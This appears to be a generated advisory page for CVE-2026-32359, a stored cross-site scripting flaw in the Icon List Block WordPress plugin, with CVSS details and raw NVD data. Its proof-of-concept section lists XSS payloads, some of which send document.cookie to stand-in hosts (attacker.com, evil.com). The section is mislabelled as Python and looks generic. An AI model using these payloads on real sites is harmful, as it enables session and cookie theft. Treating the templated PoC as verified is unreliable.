Security Vulnerability Report
中文
CVE-2026-32359 CVSS 6.5 MEDIUM

CVE-2026-32359

Published: 2026-03-13 19:54:50
Last Modified: 2026-04-22 21:30:26

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins Icon List Block icon-list-block allows Stored XSS.This issue affects Icon List Block: from n/a through <= 1.2.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Icon List Block <= 1.2.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-32359 PoC - Stored XSS in Icon List Block --> <!-- Attack Vector: Inject malicious JavaScript via Icon List Block --> <!-- Step 1: Create a new post/page with Icon List Block --> <!-- Step 2: Add an icon with the following payload in the icon name field --> <script>alert(document.cookie)</script> <!-- Or use img tag with onerror --> <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> <!-- Example HTML payload that could be stored --> <div class="icon-list-item" data-icon="<img src=x onerror=alert(document.domain)>"> <span class="icon-name"><script>fetch('https://evil.com/log?cookie='+btoa(document.cookie))</script></span> </div> <!-- When victim visits the page, the script executes in their browser -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32359", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:49.667", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins Icon List Block icon-list-block allows Stored XSS.This issue affects Icon List Block: from n/a through <= 1.2.3."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en bPlugins Icon List Block icon-list-block permite XSS Almacenado. Este problema afecta a Icon List Block: desde n/a hasta &lt;= 1.2.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/icon-list-block/vulnerability/wordpress-icon-list-block-plugin-1-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}